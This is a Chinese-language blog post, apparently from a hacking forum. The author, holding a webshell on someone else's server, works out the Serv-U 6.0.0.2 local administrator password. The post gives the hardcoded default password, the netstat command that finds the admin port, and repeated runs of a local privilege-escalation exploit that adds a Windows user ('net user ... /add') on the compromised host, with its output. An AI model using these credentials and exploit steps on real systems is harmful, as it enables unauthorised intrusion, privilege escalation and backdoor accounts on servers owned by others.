對Serv-U 6.0.0.2默認帳戶及密碼的一點理解

今天獲得一個webshell.發現了serv-u目錄.看了下ServUDaemon.ini 
[GLOBAL] 
Version=6.0.0.2 
OpenFilesDownloadMode=Exclusive 
PacketTimeOut=300 
LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39 

6.0.0.2版的.曾經看到哪說6.0版的默認本地管理帳號和密碼依舊是原來那個.可又好像聽誰說過6版的密碼已經改了.. 

呵.這裏發現.多出了一行Localsetuppassword.有種不詳的預感.難道原來的默認密碼已經通過它來設置了?加了MD5,算算純數字倒還是可以.機會渺茫.. 

試試能不能寫入...顯示權限不足(一切都在預料之內).OK試試默認帳戶和密碼吧. 

上傳了xiaolu的那個serv-u權限提升工具 

netstat -an |find "43958" 
TCP    127.0.0.1:43958        0.0.0.0:0              LISTENING 

嗯,是這個口. 

執行命令 

D:\web\www\XXXX_com\serv-u.exe 43958 "net user xiaoqi amen. /add "  
****************************************************** 
Serv-u <3.x Local Exploit by xiaolu 
>221 Serv-U FTP Server v6.0 for WinSock ready... 
>331 User name okay, need password. 
****************************************************** 
#l@$ak#.lk;0@P 
>530 Not logged in. 
****************************************************** 

看到530,心涼了一下,這麼說來默認密碼被改了. 
上羣裏想獲得一下確認.Superhei給了個很好的思路.下載主程序用UEDIT查看密碼. 
serv-u 6.0版之前要修改默認密碼也是同樣的方法,而且密碼長度要求同樣要求是14位(用其他字符替換#l@$ak#.lk;0@P).. 
打開ServUAdmin.exe查了下,發現密碼依舊是#l@$ak#.lk;0@P(特地複製到記事本觀察,防止0/O l/1等字符混淆).確實沒有變. 
那麼,看來Serv-u已經不依靠它來驗證了? 
爲了找出真像.下載了一個Serv-U 6.0.0.2版(未裝漢化,未破解,防止低版本漢化及破解補丁) 


之前就在想,爲什麼Serv-U不可以提供一個讓管理員修改密碼的地方了?多少個服務器OVER的責任在Serv-U上啊? 
好!這次來了,剛打開serv-u admin,發現在"停止服務"下面多了一個"設置更改密碼"的按鈕. 
再來看看ServUDaemon.ini,除了版本改變了以外,與原來並沒有不同之處. 
回到控制檯點開"設置更改密碼"要求輸入舊密碼,新密碼,確認.舊密碼?舊密碼是什麼?#l@$ak#.lk;0@P嗎? 
提示密碼不正確..怪了.試了下空密碼...正確..這可把我鬱悶了.難道在Serv-U 6.0.0.2裏LocalAdministrator的密碼就是空??? 
把xiaolu的權限提升工具拿來改了下,把密碼改成空.編譯好重新傳了上去. 

執行命令 

D:\web\www\XXXX_com\serv-u2.exe 43958 "net user xiaoqi amen. /add "  
****************************************************** 
Serv-u <3.x Local Exploit by xiaolu 
>221 Serv-U FTP Server v6.0 for WinSock ready... 
>331 User name okay, need password. 
****************************************************** 
>530 Not logged in. 
****************************************************** 

依然是530.呵..真是在做夢啊我.不過這次失敗並不能代表默認密碼不爲空(因爲這臺機器的配置文件中有LocalSetupPassword=) 
好的.回過頭,看了下我機器上的ServUDaemon.ini,果然多了一行Localsetuppassword=xxxxxxx,看來確是剛纔配置密碼的MD5了.把我機器上Serv-u的密碼改成空的(竟然允許我空的)再用這個serv-u2.exe試了下.不行..530,腦中突然閃過,難道"空"就是#l@$ak#.lk;0@P 
操起serv-u.exe,yeah!成功. 
到這裏我們要開始懷疑一個問題了,如果修改了密碼,那麼就需要進行二次驗證了?一次是#l@$ak#.lk;0@P 一次是修改完的密碼. 
呵..興沖沖地跟superhei說了句"二次驗證",修改了下那個權限提升工具,把其中的密碼改爲我在Serv-U中設置的密碼,連上了.證明了沒有進行二次驗證. 
總結一下,在Serv-U 6.0.0.2版本中,初始密碼依舊是#l@$ak#.lk;0@P 但可以很方便地在Serv-U admin控制檯修改密碼,修改完密碼,配置保存在ServUDaemon.ini的LocalSetupPassword=中. 
原來的#l@$ak#.lk;0@P依舊保存只有當密碼爲空時使用. 

另:要修改本地管理端口.只需要在ServUDaemon.ini中的[global]里加上一行LocalSetupPortNo=端口號,既可 
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章